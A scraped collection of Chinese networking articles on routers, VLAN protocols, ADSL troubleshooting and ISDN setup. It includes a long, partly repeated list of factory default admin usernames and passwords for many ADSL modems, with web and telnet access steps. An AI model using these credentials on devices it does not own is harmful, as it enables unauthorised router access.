    Quidway 提供固定的以太网接口并在1U的设备高度中提供多达三个接口模块，可以满足不同用户的不同需求和网络环境，并可实现网络规模跟随用户业务不断发展而逐步扩容，通过提供高密度的语音接口模块，实现数据语音一体化传送，大幅度降低用户的网络使用费用，是一种性能价格比更高的网络设备解决方案

    四、Quidway R2630系列路由器采用了高性能处理器和高速总线技术，核心操作系统使用华为公司自主知识产权的VRP通用路由平台，支持快速路由、OOS等新特性，具有很强的可伸缩性，可配置性，并且接口开放。

    五、Quidway R2630系列路由器支持接口备份、链路备份、路由备份功能，可以在转限于拨号之间、拨号与拨号线之间备份，可以满足DDN、FR、X25、PSTN、ISDN等各种网络之间的互相备份需求，为用户提供稳定的、实时的、灵活的网络解决方案，同时也为用户提供强大的安全的保障体系，包括包过滤技术、地址转换、VPN技术、Call Back技术、AAA、日志管理、验证等。

    六、Quidway R2630系列路由器具有丰富的告警和良好的可维护性，支持设备告警和资源告警，可以用蜂鸣器鸣响和向网管站发送信息的方式进行告警信息传递。同时还具有良好的网管支持，对于大型的网络结构，华为公司提供基于工作站的综合网关平台RadiumsNMS，它可以管理接入服务器、个性好路由器、乃至于ATM交换机等大型网络设备；而对于仅使用中、小型路由器的小型网络，华为公司提供成本低、使用灵活的Quidview路由管理工具，能够针对用户的需要，将网络设备运行信息直观而简练地呈现与用户面前。

    利用QuidwayR2630系列路由器的语音模块，可以对数据网进行带宽共享，提供网络节点间的IP电话连接。同时利用DDN、帧中继或X.25作为主线，PSTN或ISDN拨号线为备用线，组建企业网或行业网。

返回


TP-LINK内猫与PCI插槽的兼容性问题

《一键清理系统垃圾》

TP-LINK内猫与PCI插槽的兼容性问题

    前些日子禁不住TP－LINK 56K“猫”的诱人价格，终于直奔电脑城，以140元的低价买回一只TP－LINK的56K PCI内置“小猫”，老板对我说，这是只半硬猫，采用ambient5620芯片，口碑不错。
    一回到家中，我便熟练地将它插入机箱中，因为有装内猫的经验，得知内猫也是相当怕热的，而我的显卡又是发热大户，创新permedia2v（已经加了一个风扇），所以就将它远远地插入了我的华硕TX97－E主板的第四条，也就是最后一条PCI插槽中。然后顺利地安装驱动程序，拨号上网，连接速度约47K，本地下载4KB至5KB，还不错。可是数天后，当我正在上网收信时，突然听到“嗒”地一声，似乎是从机箱内发出来的。然后我的第一反应是看看是否断线，发现右下脚的连线标志还在，但是仔细一看，只有我方发出的字节数在增加，而对方却没有响应。我当即下线，想重新拨号上网，但是奇怪的是在连接时，弹出一个对话诓“调制解调器没有响应，请确认已连接到电话线或调制解调器已正确安装”。
    我开始怀疑是网络通讯协议出错，进入网络将无用的协议删除后重启，再拨号，一切OK。但是好景不长，没过20分钟，它就又旧病复发了。进入拨号网络里想看一下拨号属性，却又弹出了一个对话框“没有检测到调制解调器，请确认调制解调器已安装”。怀疑是接触不良，便打开了机箱重新插了一趟，开机后还是老毛病。
    无法，我将猫卸下，装入朋友的机器中试了试，一点事也没有，跑的还挺欢的，说明猫是好的。可是，当我将其再次装入我的机器时，老毛病又来了。气得我头昏。后来冷静地想了想，曾经在一篇文章上看到有关PCI槽的最后一条插槽有兼容性问题。我的第四条PCI槽从未用过，难道是兼容性问题？我将它拔起并换到中间的第三条插槽后，万事大吉。
    以上是我一次古怪问题的处理经过，希望能给予你一些启示：机器出毛病了，应想一下硬件兼容性问题。


VLAN中的VTP和STP

《一键清理系统垃圾》

VLAN中的VTP和STP

    随着网络技术日新月异，L3，L4交换已经非常成熟。Internet中也越来越广泛地应用了交换技术，全交换网络已经非常普遍。在这些网络中，VLAN的使用是必不可少的。

1．VLAN（Virtual LANs）的描述

VLAN是一个根据作用、计划组、应用等进行逻辑划分的交换式网络。与用户的物理位置没有关系。举个例子来说，几个终端可能被组成一个部分，可能包括工程师或财务人员。当终端的实际物理位置比较相近，可以组成一个局域网（LAN）。如果他们在不同的建筑物中，就可以通过VLAN将他们聚合在一起。同一个VLAN中的端口可以接受VLAN中的广播包。但别的VLAN中的端口却接受不到。

VLAN提供以下一些特性

* 简化了终端的删除、增加、改动

当一个终端从物理上移动到一个新的位置，它的特征可以从网络管理工作站通过SNMP或用户界面菜单中重新定义。而对于仅在同一个VLAN中移动的终端来说，它会保持以前定义的特征。在不同VLAN中移动的终端来说，终端可以获得新的VLAN定义。

* 控制通讯活动

VLAN可以由相同或不同的交换机端口组成。广播信息被限制在VLAN中。这个特征限定了只在VLAN中的端口才有广播、多播通讯。管理域（management domain）是一个仅有单一管理者的多个VLAN的集合。

* 工作组和网络安全

将网络划分不同的域可以增加安全性。VLAN可以限制广播域的用户数。控制VLAN的大小和组成可以控制广播域的相应特性。

在VLAN中应用最广的就是VTP和STP技术。它们是VLAN中优点的集中体现。

2．VTP（VLAN Trunking Protocol）

VTP通过网络保持VLAN配置统一性。VTP在系统级管理增加，删除，调整的VLAN，自动地将信息向网络中其它的交换机广播。此外，VTP减小了那些可能导致安全问题的配置。

* 当使用多重名字VLAN能变成交叉--连接。

* 当它们是错误地映射在一个和其它局域网，VLAN能变成内部断开。

VTP模式

当交换机是在VTP Server或透明的模式，能在交换机配置VLAN。当交换机配置在VTP Server或透明的模式，使用CLI、控制台菜单、MIB（当使用SNMP简单网络管理协议管理工作站）修改VLAN配置。

一个配置为VTP Server模式的交换机向邻近的交换机广播VLAN配置，通过它的Trunk从邻近的交换机学习新的VLAN配置。在Server模式下可以通过MIB，CLI，或者控制台模式添加、删除和修改VLAN。

例如：增加了一个VLAN，VTP将广播这个新的VLAN，Server和Client机的Trunk网络端口准备接收信息。

在交换机自动转到VTP的Client模式后，它会传送广播信息并从广播中学习新的信息。但是，不能通过MIB、CLI、或者控制台来增加、删除、修改VLAN。VTP Client端不能保持VLAN信息在非易失存储器中。当启动时，它会通过Trunk网络端口接受广播信息，学习配置信息。

在VTP透明的模式，交换不做广播或从网络学习VLAN配置。当一个交换机是在VTP透明的模式，能通过控制台、CLI、MIB来修改、增加、删除VLAN。

为使每一个VLAN能够使用，必须使VTP知道。并且包含在Trunk port 的准许列表中，一个快速以太网ISL Trunk自动为VLAN传输数据，并且从一个交换机到另一个交换机。

需要注意的是如果交换在VTP Server模式接收广播包含128多个VLAN，交换自动地转换向VTP Client模式。

更改交换机从VTP Client模式向VTP透明的模式，交换机保持初始、唯一128VLAN并删除剩余的VLAN。

传送VTP信息

每个交换机用VTP广播Trunk端口的管理域，定义特定的VLAN边界，它的配置修订号，已知VLAN和特定参数。在一个VTP管理域登记后交换机才能工作。

通过Trunk，VTP Server向其它交换机传输信息和接收更新。VTP Server也在NVRAM中保存本VTP管理域信息中 VLAN的列表。 VTP能通过统一的名字和内部的列表动态显示出管理域中的VLAN。

VTP信息在全部Trunk连接上传输，包括ISL、IEEE802.10、LANE。VTP MIB为VTP提供SNMP工具，并允许浏览VTP参数配置。

VTP建立共用的配置值和分布下列的共用的配置信息:

* VLAN IDs（ISL）

* 仿效LAN的名字（ATM LANE）

* IEEE802.10 SAID值（FDDI）

* VLAN中最大的传输单元（MTU）大小

* 帧格式

3．Spanning-Tree Protocol（生成树协议）

STP能够提供路径冗余，即使网络中有多条有效路径会引起不正常的环路，导致网络不正常时。使用STP可以使两个终端中只有一条有效路径。

STP在大的网络中定义了一个树，并且迫使一定的备份路径处于Standby状态。如果spanning tree中的网络一部分不可达，或者STP值变化了，spanning-tree算法会重新计算spanning-tree拓扑，并且通过启动备份路径来重新建立连接。STP操作对于终端来说是透明的。而终端不管它们连在LAN的一部分或者多个部分。

在不同的VLANs配置Spanning-Tree Protocol。 当创建网络时，网络中所有节点存在多条路径。spanning-tree中的算法计算出最佳路径。因为每个VLAN是一个逻辑LAN部分，你能使STP一次工作在最多64个VLAN，如果要配置超过64个VLAN，需要将其它VLAN的STP禁止。默认的，STP可以支持1--64个VLAN。

返回


八大绝招查找和排除ADSL变慢原因

《一键清理系统垃圾》

八大绝招查找和排除ADSL变慢原因

    有用户反映，ADSL高速宽带网在使用过程中，有时还不如原来的窄带MODEM(调制解调器)上网速度快。那么，上网速度慢主要由哪些原因造成的？如何快速查找和排除呢？

    1.网卡绑定的协议太多。

    上网速度慢，在局域网用户中很常见，原因是网卡绑定的协议太多。网卡上如果绑定了许多协议，当数据通过网卡时，计算机就要花费很多时间来确定这个数据使用哪种协议来传送，这时用户就会感觉上网慢。解决方法是：让一块网卡只运行PPPOE协议来连接ADSL，提供上网的外部连接，另一块网卡运行局域网的其他协议，从而各尽其职提高性能，这样客户端上网速度就会改善。

    2.ADSL设备散热不良。

    ADSL设备工作时发热量比较大，平时要注意散热，许多用户把ADSL设备和路由器、集线器等放在一个机柜里，各种设备工作时一块散热，对ADSL的正常工作有影响。如刚上网时正常，5分钟左右，网速下降，下载速率与窄带56kMODEM一样，这时用手摸设备很烫，换一个ADSL设备，速度就上来了。所以，微机、ADSL等设备不可放在同一机柜内，要分散摆放，设备之间留有通风散热通道，微机房间最好做到恒温，一般环境温度应控制在10℃～30℃。相对湿度保持在40%～70%为好。

    3.访问互联网接口错误。

    这是由于Windows(窗口软件)的Internet连接向导给IE指定的访问互联网接口错误引起的，Enterhet300(虚拟拨号软件)使用的是局域网类型虚拟拨号，而IE缺省使用普通拨号，浏览的时候IE首先寻找拨号接口。找不到拨号以后就找局域网里面有没有代理服务器，最后才会找到Enternet300这个接口，所以会很慢，只需要重新运行一遍Internet(互联网)连接向导，选择局域网方式，并取消自动搜索代理服务器就可解决。

    4.系统不支持多任务。

    如果用户的计算机刚刚符合最低配置，故系统就不能支持同时浏览网页、下载软件、听音乐等多项任务。多种任务同时工作时就会感觉上网慢。因此，同时工作任务一般不超过两项为好。

    5.未绑定TCP/IP协议。

    未绑定TCP(传输控制协议)/IP(国际协议)，多为网卡驱动程序没装好、网卡质量有问题、PCI(总线标准)插槽不好。应先把设备管理器里的网卡驱动删除，重启后安装驱动程序；如果不好，把网卡换一个PCI插槽，仍不好可再换一块网卡。

    6.电话线路质量低劣。

    ADSL技术对电话线路的质量要求较高，目前采用的ADSL是一种RADSL(即速率自适应ADSL)，如果电话局到用户间的电话线路在某段时间受到外在因素干扰，RADSL会根据线路质量的优劣和传输距离的远近，动态地调整用户的访问速度。如访问的是国外站点，速度会受到出口带宽及对方站点线路、设备配置情况等因素影响，需要全网协调配合解决。线路问题主要有：因为施工时未遵循施工标准，遗留质量隐患，如没加塑料套管导致老鼠咬断线路；配线架或其他材料因质量问题，导致跳线接触不良；用户在装修时暗敷的室内线损坏等。

    7.软件没有重新设置。

    用户安装ADSL宽带后，上网条件已经发生变化，相应的工具软件却没有重新设置，也是造成速度慢的原因之一。如通信软件QQ，就需要对它进行一些设置。从QQ面板中选择“系统参数”命令，点击“网络设置”标签，将原来的“拨号上网”改为“局域网接入Internet”就可以了。

    8.微机硬件软件问题。

    硬件故障主要表现在用户网卡损坏或没有正确安装；用户微机主板和网卡不兼容；用户微机档次太低，内存少导致运行速度慢。如硬件配置赛扬600/64MB内存，WINDOWSXP操作系统，会导致微机运行相当慢，上网速度也不可能高。软件故障主要是由于用户不了解计算机知识，在使用过程中误操作，导致操作系统出错或拨号软件损坏而无法上网；用户没有正确操作，使拨号软件非法关闭，导致软件出错；用户浏览一些网页后，系统出现问题，在处理时不慎将备份的拨号软件删掉；用户微机出现问题，重装系统后，没有安装拨号软件。这些问题只要重新安装拨号软件故障即可排除。


八种常见的ADSL断流现象

《一键清理系统垃圾》

八种常见的ADSL断流现象

网页打不开、下载中断、或者在线视、音频流中断，这些情况都是很多使用ADSL上网的人会遇到的麻烦。可是当仔细检查ADSL MODEM的状态时，又会发现拨号登录已经成功。那么问题究竟出在哪里？ADSL用户该如何排查呢？

线路不稳定
如果住所离电信局太远（5公里以上）可以向电信部门申报。确保线路连接正确（不同的话音分离器的连接方法有所不同，请务必按照说明书指引正确连接）。同时确保线路通讯质量良好没有被干扰，没有连接其它会造成线路干扰的设备，例如电话分机，传真机等。并检查接线盒和水晶头有没有接触不良以及是否与其它电线串绕在一起。有条件最好用标准电话线，如果是符ITU国际电信联盟标准的三类、五类或超五类双绞线更好。电话线入户后就分开走。一线走电话、一线走电脑。如果居住的房间都希望安装电话分机，最好选用质量好的分线盒。PC接ADSL Modem附带的双绞线。（连接图示见各自说明书）

注意：手机一定不要放在ADSL Modem的旁边，因为每隔几分钟手机会自动查找网络，这时强大的电磁波干扰足以造成ADSL Modem断流。

网卡选购有学问
检查您的网卡，如果是ISA网卡最好能换成PCI的，并且选择质量好的网卡，太便宜的网卡可能是造成问题的罪魁祸首。10M或10M/100M自适应网卡都可。另外，双网卡引起冲突同样值得关注，这时，应当拔起连接局域网或其它电脑的网卡，只用连接ADSL的网卡上网测试，如果故障恢复正常，检查两块网卡有没有冲突 。

ADSL Modem或者网卡设置有误
最常见的是设置错了ADSL Modem的IP地址，或是错误设置了DNS服务器。因为对于ADSL虚拟拨号的用户来说，是不需要设定IP地址的，自动分配即可。TCP/IP网关一般也不需要设置。另外如果设定DNS一定要设置正确，如果操作系统是Windows 9x，在DOS窗口下键入Winipcfg获取DNS地址，在Windows 2000/XP下键入ipconfig /renew，或询问当地电信部门。

另外，TCP/IP设置最容易引起不能浏览网页的情况，例如没有更改过设置，一直可以正常浏览，突然发现浏览不正常了，就可以试着删除TCP/IP协议后重新添加TCP/IP 协议。

ADSL Modem同步异常
检查一下自己的电话线和ADSL连接的地方是否接触不良，或者是电话线出现了问题。如果怀疑分离器坏或ADSL Modem坏，尝试不使用分离器而直接将外线接入ADSL Modem。如果确定是分离器没有问题，要保证分离器与ADSL Modem的连线不应该过长，太长的话同步很困难。如果排除上述情况，只要重起ADSL Modem就可以解决同步问题。

操作系统有缺陷
有的操作系统可能对ADSL的相关组件存在兼容性问题，以Windows 98为例，它的网络组件存在重大缺陷，连网时都会出现莫名其妙的断流问题。遇到这种情况最好的解决方法是给系统打补丁，你可以直接连接到微软的官方网站，选择系统搜索到的补丁下载。待补丁安装完成后，再安装虚拟拨号软件打补丁解决。

主要补丁有：Windows 98 SE版的补丁、Windows 98 拨号网络1.3升级1.4补丁、Windows 95当时用WinPoET,RasPPPoE这类依*操作系统的拨号网络工作的软件请首先安装“微软拨号网络1.3”方能正常工作、微软拨号网络 MSDUN1.4。

拨号软件互扰
ADSL接入Internet的方式有虚拟拨号和专线接入两种，现在个人用户的ADSL大都是采用前者。而PPPOE（Point-to-Point Protocol over Ethernet以太网上的点对点协议）虚拟拨号软件都有各自的优缺点。经过多方在不同操作系统的测试，如果使用的操作系统是Windows XP，推荐用它自带PPPOE拨号软件，断流现象较少，稳定性也相对提高。如果使用的是Windows ME或9x，可以用以下几种虚拟拨号软件——EnterNet、WinPoET、RasPPPoE。其中，EnterNet是现在比较常用的一款，EnterNet 300适用于Windows 9x；EnterNet 500适用于Windows 2000/XP。当你用一个PPPOE拨号软件有问题时，不妨卸载这个软件后换用一个其它的PPPOE拨号软件，请务必注意不要同时装多个PPPOE软件，以免造成冲突。

其他软件冲突
卸载有可能引起断流的软件，现在发现某些软件例如QQ 2000b等，偶然会造成上网断流，具体什么条件下会引发，尚要进一步测试。不少网友卸载后就发现断流问题解决了，包括用普通Modem 163拨号上网的用户也有用这种方法解决了断流问题的情况，笔者也收到朋友的邮件反映卸载QQ后断流问题解决，所以如果你有QQ，不妨先卸载你的OICQ，然后再上网试试。当你发现打开某些软件就有断流现象，关闭该软件就一切正常时，卸载该软件试试。

病毒攻击和防火墙软件设置不当
虽然受到黑客和病毒的攻击可能性较小，但也不排除可能性。病毒如果破坏了ADSL相关组件也会有发生断流现象。建议安装“天网防火墙”或者“金山网镖”网络防火墙，它们都可以实时监控你的计算机和网络的通讯情况，并警告提示莫名的网络访问方式，有效降低受攻击的危险性。如果能确定受到病毒的破坏和攻击，还发生断流现象时就应该检查安装的防火墙、共享上网的代理服务器软件、上网加速软件等，停止运行这类软件后，再上网测试，看速度是否恢复正常。


不能上网，只因电话欠费

《一键清理系统垃圾》

不能上网，只因电话欠费

《中国电脑教育报》熊城

    本人经常给同事的电脑做“手术”，遇到最多的就是不能上网的问题。

    某日，一位同事说他的电脑突然不能上网了，叫我过去看看，我过去先把Modem的驱动程序重新安装一遍，不行；查看各种设置，没有错误；打开机箱，把“猫”取出来认真查看，完好无缺，再认真插到另外一个PCI插槽还不行。难道这么一个问题就难倒我这个“大虾”了吗？那我以后怎么混？我停下来认真思考了一下，既然电脑没有问题，那肯定是外部问题了，我查看了电话线同主机的接口，也没有错。电话线也完好，没有断裂的痕迹。正在一筹莫展之时，拿起了电话想要听听是否有声音，里面突然传来了一个甜美的女声：“当你拿起电话时请在15天之内到电信交纳话费，否则被停机直至拆机。”我才明白，原来不能上网不是Modem的错，而是电话欠费！同事也恍然大悟，电话早已过了交费日期（后知后觉，差点坏了我的名声……）。

    还有一次问题也很相似，但不是电话欠费，而是电话那边的长途锁被锁住了，故不能上网。从此，我在遇到这类问题的时候，都会考虑一下电脑的外部环境再作判断，俗话说的好，小心驶得万年船嘛。


部分ADSL猫的默认密码

《一键清理系统垃圾》

部分ADSL猫的默认密码

艾玛 701g
192.168.101.1 192.168.0.1
用户名：admin 密码：admin
用户名：SZIM 密码：SZIM

艾玛701H
192.168.1.1 10.0.0.2
用户名：admin 密码：epicrouter

实达2110EH ROUTER
192.168.10.1
用户名：user 密码：password
用户名：root 密码：grouter

神州数码/华硕：
用户名：adsl 密码：adsl1234

全向：
用户名：root 密码：root

普天：
用户名：admin 密码：dare

e-tek
用户名:admin 密码:12345

zyxel
用户名:anonymous 密码:1234

北电
用户名:anonymous 密码:12345

大恒
用户名：admin 密码：admin

大唐
用户名：admin 密码：1234

斯威特
用户名：root 密码：root
用户名：user 密码：user
中兴

用户名：adsl 密码：adsl831 (中兴的adsl的密码前面为adsl，后面为型号,比如中兴831，密码就是adsl831)

1、全向QL1680 IP地址10.0.0.2，用户名：admin，密码：qxcomm1680，管理员密码：qxcommsupport。全向
QL1880 IP地址192.168.1.1，用户名：root，密码：root 全向QL1688 IP地址10.0.0.2，用户名为admin；密码为qxcomm1688
2、TP-LINK TD-8800在IE输入192.168.1.1,户名admin,密码admin
3、合勤zyxel 642 在运行输入telnet 192.168.1.1 密码1234
4、Ecom ED-802EG 在IE输入192.168.1.1，用户名和密码都为root
5、神州数码6010RA，在IE输入192.168.1.1　用户名为ADSL，密码为ADSL1234
6、华为SmartAX MT800的初始IP是192.168.1.1，用户名和密码都为ADMIN，恢复默认配置的方法有两种，一种是连续按MODEM背后的RESET键三次，另一种是在配置菜单的SAVE&REBOOT里选择恢复默认配置。
7、伊泰克：IP：192.168.1.1 用户名：supervisor 密码：12345
8、华硕IP：192.168.1.1 用户名：adsl 密码：adsl1234
9、阿尔卡特 192.168.1.1 一般没有密码
10、同维DSL699E 192.168.1.1 用户名：ROOT 密码：ROOT
11、大亚DB102 192.168.1.1 用户名：admin 密码：dare 高级设置://192.168.1.1/doc/index1.htm
12、WST的RT1080 192.168.0.1 username:root password:root
13、WST的ART18CX 10.0.0.2 username:admin password:conexant username:user password:password
14、实达V3.2　root root V5.4　root grouter
15、泛德　admin conexant
16、东信Ea700 192.168.1.1用户名：空 密码：password
17、broadmax的hsa300a 192.168.0.1 username:broadmax password:broadmax
18、长虹ch-500E 192.168.1.1 username:root password:root
19、重庆普天CP ADSL03 192.168.1.1 username:root password:root
20、台湾突破EA110 RS232:38400 192.168.7.1 username:DSL psw:DSL
21、etek-td的ADSL_T07L006.0 192.168.1.1 User Name: supervisor
Password: 12345 忘记密码的解决办法： 使用超级终端的Xmodem方式重写Vxworks.dlf，密码恢复成：12345 22、GVC的DSL-802E/R3A 10.0.0.2 username:admin password:epicrouter username:user password:password
23、科迈易通km300A-1 192.168.1.1 username: password:password 科迈易通km300A-G 192.168.1.1 username:root password:root 科迈易通km300A-A 192.168.1.1 username:root or admin password:123456
24、sunrise的SR-DSL-AE 192.168.1.1 username:admin password:0000 sunrise的DSL-802E_R3A 10.0.0.2 username:admin password:epicrouter username:user password:password

25、UTStar的ut-300R 192.168.1.1 username:root or admin password:utstar 这些都是一些ADSL设奋的出厂时的默认初始IP，用户名和密码，是要调试这些设奋时必须要知道的东西。 一般调试这些设奋有三种方法，一种是最常见的WEB方法，就是在浏览器中填入设奋的IP，如QX1680，就是在浏览器地址栏输入10.0.0.2，出现提示栏后，输入用户名admin，密码qxcommsupport,就可以管理员设置界面了。最常见和最简单的就是这种方法。 第二种方法就是用TELNET的方法，telnet IP,如早期的合勤642，方法telnet 192.168.1.1,然后输入密码1234,就可以进入全英文的字符界面了。 第三种方法就是用厂商自带的配置程序来进入配置界面，如CyberLink 6307/6309KG 它使用在随Cybrlink 6307/6309KG带的光盘中DSLCom.exe， 出厂时默认值：路由IP地址 :1 92.168.1.1密码 : stm，由于这种方法没有前两种方法方便，所以现在的低端产品比较少采用了。 绝大部分产品的调试都是要先通过产品自带的双绞线连接设奋后，把本机网卡的IP设置成跟该设奋同一网段，再进行配置，如设奋被改了默认的IP或者密码，大部分都可以通过复位来恢复出厂默认值。最常用也是最有用的方法就是把设奋断电后，一直按住复位键，然后通电，持续一小段时间后就可以恢中达通CT-500 192.168.1.1 root/12345
26.中兴adsl841默认IP：192.168.1.1，UserName：admin，Password：private

成都天逸 用户名：admin 密码：epicrouter

上海中达 用户名：（随意） 密码：12345

各位用ADSL的朋友，在拿到ADSL猫后，应及时修改默认密码，以免被人所利用

****************************************************************************
ADSL MODEM初始地址及用户名密码大全
要调试这些设奋，要先把网卡的IP地址设置成跟这些ADSL设奋相同的网段
1、全向QL1680在IE浏览器的地址栏里面敲入IP地址10.0.0.2，的用户名是admin出厂时默认值：密码是qxcomm1680，管理员密码是 qxcommsupport
2、全向QL1880在IE浏览器的地址栏里面敲入IP地址192.168.1.1，的用户名是root出厂时默认值：密码是root
3、全向QL1688在IE浏览器的地址栏里面敲入IP地址10.0.0.2，用户名为admin；出厂时默认值：密码为qxcomm1688
4、CyberLink 6307/6309KG 它使用在随Cyberlink6307/6309KG带的光盘中DSLCom.exe， 出厂时默认值：路由IP地址 : 192.168.1.1密码 : stm
5、TP-LINK TD-8800在IE输入192.168.1.1,户名admin,密码admin.
6、合勤zyxel 642 在运行输入telnet 192.168.1.1 密码1234,一直按住机身后面的的RESET复位键然后开机，保持几十秒就可以恢复出厂默认 值。
7、Ecom ED-802EG 在IE输入192.168.1.1，用户名和密码都为root
8、神州数码6010RA，在IE输入192.168.1.1　用户名为ADSL，密码为ADSL1234
9、华为SmartAX MT800的初始IP是192.168.1.1，用户名和密码都为ADMIN，恢复默认配置的方法有两种，一种是连续按MODEM背后的RESET键三 次，另一种是在配置菜单的SAVE&REBOOT里选择恢复默认配置。

伊泰克
http://192.168.1.1/
用户名：supervisor
密码：12345

华硕
http://192.168.1.1/
用户名：adsl
密码：adsl1234

阿尔卡特
http://192.168.1.1/
一般没有密码

同维DSL699E
http://192.168.1.1/
用户名：ROOT
密码：ROOT

大亚DB102
http://192.168.1.1/
用户名：admin
密码：dare
高级设置界面：http://192.168.1.1/doc/index1.htm
WST的RT1080
http://192.168.0.1/
username:root
password:root

WST的ART18CX
http://10.0.0.2/
username:admin
password:conexant
username:user
password ：assword

全向qxcomm1688
http://192.168.1.1/
高端设置密码是：qxcommsuport

全向qxcomm1680
http://192.168.1.1/
登陆ADSL的密码是:qxcomm1680

实达
V3.2　root
root
V5.4　root
grouter

泛德
admin
conexant

东信Ea700
http://192.168.1.1/
用户名：空
密码：password

broadmax的hsa300a
http://192.168.0.1/
username:broadmax
password:broadmax

长虹ch-500E
http://192.168.1.1/
username:root
password:root

重庆普天CP ADSL03
http://192.168.1.1/
username:root
password:root

台湾突破EA110
RS232:38400
http://192.168.7.1/
username SL
psw SL

etek-td的ADSL_T07L006.0
http://192.168.1.1/
User Name: supervisor
Password: 12345
忘记密码的解决办法：
使用超级终端的Xmodem方式重写Vxworks.dlf，密码恢复成：12345

GVC的DSL-802E/R3A
http://10.0.0.2/
username:admin
password:epicrouter
username:user
password assword

科迈易通km300A-1
http://192.168.1.1/
username:
password assword

科迈易通km300A-G
http://192.168.1.1/
username:root
password:root

科迈易通km300A-A
http://192.168.1.1/
username:root or admin
password:123456

sunrise的SR-DSL-AE
http://192.168.1.1/
username:admin
password:0000

sunrise的DSL-802E_R3A
http://10.0.0.2/
username:admin
password:epicrouter
username:user
password assword

UTStar的ut-300R
http://192.168.1.1/
username:root or admin
password:utstar

这些都是一些ADSL设奋的出厂时的默认初始IP，用户名和密码，是要调试这些设奋时必须要知道的东西。

一般调试这些设奋有三种方法，一种是最常见的WEB方法，就是在浏览器中填入设奋的IP，如QX1680，就是在 浏览器地址栏输入10.0.0.2，出现提示栏后，输入用户名admin，密码qxcommsupport,就可以管理员设置界面了。最常见和最简单的就是这种方法。

第二种方法就是用TELNET的方法，telnet IP,如早期的合勤642，方法telnet
192.168.1.1,然后输入密码1234,就可以进入全英文的字符界面了。

第三种方法就是用厂商自带的配置程序来进入配置界面，如CyberLink 6307/6309KG
它使用在随Cybrlink 6307/6309KG带的光盘中DSLCom.exe，
出厂时默认值：路由IP地址 :1 92.168.1.1密码 :
stm，由于这种方法没有前两种方法方便，所以现在的低端产品比较少采用了。

绝大部分产品的调试都是要先通过产品自带的双绞线连接设奋后，把本机网卡的IP设置成跟该设奋同一网段，再进行配置，如设奋被改了默认的IP或者密码，大部分都可以通过复位来恢复出厂默认值。最常用也是最有用的方法就是把设奋断电后，一直按住复位键，然后通电，持续一小段时间后就可以恢复出厂默认值了


畅游Internet用ISDN路由器

《一键清理系统垃圾》

畅游Internet用ISDN路由器

    ISDN上网可获得较快的速度，连线时间短、可靠性高、软件下载速度快。这种上网方式对中小企业、团体用户和政府上网来说，可以实现多个用户通过一根电话线共用一个账号同时上网，非常便利可靠。本文向大家介绍一种利用ISDN路由器上网的典型设置方法，连接方式如图所示，其中路由器用的是ZyXEL(台湾合勤)P100IH路由器。

    ■ 第一步 配置ISDN路由器

    1． 把ISDN的CONSOLE口与PC的串口相连。

    2． 在Win98中用超级终端与路由器建立联系并进入路由器的设置程序。

    3． 设置路由器参数（填入以下各项即可，其他均为默认值）。

    （1）Menu1-General Setup 填入系统信息（可任意）

    Systen Name=yzrb 系统名称

    Location=yz 地点

    Contact Person's Name=AAA 用户名

    （2）Menu2-ISDN Setup

    Switch Type:DDS-1

    B Channel Usage=Switch/Switch

    ISDN Data=7086001 用户ISDN电话号码

    A/B Adapter 1=7086001

    A/B Adapter 2=7086001

    （3）Menu 3.2-TCP/IP and DHCP Ethernet Setup

    DHCP Setup:

    DHCP=None

    Client IP Pool Starting Address=N/A

    Size of Client IP Pool=N/A

    Primary DNS Server=N/A

    Secondary DNS Server=N/A

    TCP/IP Setup:

    IP Address=192.168.120.1 为路由器设一个IP地址

    IP Subnet Ｍask=255.255.225.0 填写本网段的子网掩码

    RIP Direction=Both 允许双向传输数据

    Version=RIP-2B 软件版本

    （4）Menu4-Internet Access Setup

    ISP's Name=yzonline ISP名称

    Pri Phone#=163 拨号上网号码

    Sec Phone#=

    My Login=yzrb 上网账号

    My Password= 1234 上网密码

    Single User Account=ye 用户账号

    IP Addr=0.0.0.0

    Telco Option:

    Transfer Typer=64k

    Multilink=BOD B1和B2通道自动绑定（这项可节省上网费用，不要设成Always方式）

    Idle Timeout=300 ISDN线路空闲300秒自动挂断，该时间可根据需要设定

    (5) Menu11.1-Remote Node Profile

    Call Direction=Outgoing 如果路由器仅用于上网可以这样设

    Rem IP Addr=0.0.0.0

    （6）Menu11.2-Remote Node PPP Option

    Add Persist(sec)=30 B1和B2通道松开绑定延时，默认为5秒，建议稍长一点

    Subtract Persist(sec)=30 B1和B2通道绑定延时，默认为5秒，建议稍长一点

    ■ 第二步 配置客户端（Win95/98工作站）

    1． 工作站用TCP/IP协议，IP地址设成与路由器在同一个网段。比如，IP=192.168.120.2 (不要和路由器的IP地址相同)，子网掩码为255.255.255.0。

    2．所有上网客户端网关均设成192.168.120.1（为路由器的IP地址）。

    3．配DNS，输入ISP域名服务器的IP地址。

    4． 禁用wins解析。

    5． 如果上网用户较多，可与路由器级连HUB扩充RJ45接口。

    经过上述设置后用户即可在网上畅游了。

    ISDN路由器硬件接线图

返回


成电先锋路由器组建电力调度网

《一键清理系统垃圾》

成电先锋路由器组建电力调度网

    江西省某电力公司采用100台成电先锋SR2500系列G.703/E1路由器组建了电力调度监控系统数据网络。
    ■ 连接方式
    路由器的10Mbps以太网口通过双绞线与各控制中心及变电所的局域网相连，构成数据链路通道。路由器的G.703/E1广域网口提供G.703协议，直接与2Mbps光端机相连，光端机将电信号转换成光信号通过光缆进行传输，形成通信链路。
    ■ 路由功能
    各局域网（分控中心、变电所）都有自己的IP地址，当进行通信时，例如，总控中心需了解每个变电所的各项监控指标，这些指标已通过路由器自动传输至总控中心的服务器，并已进行存贮，只要在监控PC机上键入所需访问的工作站IP地址，路由器便可自动找到需访问的服务器或工作站，并进行登录，通信联系建立后，可直接调取服务器上的各种数据及信息，直到通信完成。

    路由器在网络系统中的作用是对需要寻找的IP地址进行广播路由，并建立一条最短通信链路，链路建立后将其固化，形成热线通讯。
    ■ 传输
    路由器的以太网口支持10Mbps局域网，它的G.703/E1广域网口与光端机相连，其传输距离取决于光端机传输能力。
    ■ 方案描述
    总控室配置一台SR2501-2路由器，它有两个G.703/E1广域网口，每一个G.703/E1广域网口与光端机相连，通过光纤与分控中心配置的一台SR2505路由器相连，SR2505路由器的10M以太网口又与分控中心局域网相通，再通过集线器连接三台SR2501-2路由器。分控室配置的SR2501-2路由器通过光端机和光缆与各配电所配置的SR2501路由器相连。

    各配电所采集到的监控数据、图像等首先传至分控室并存贮在分控室服务器中（也可不存），再通过路由器及光端机传至总控中心，完成总控、分控、变电所三级传输。

    总控室可随意登录到分控中心或各变电所，采集所需的各项监控数据和图像。

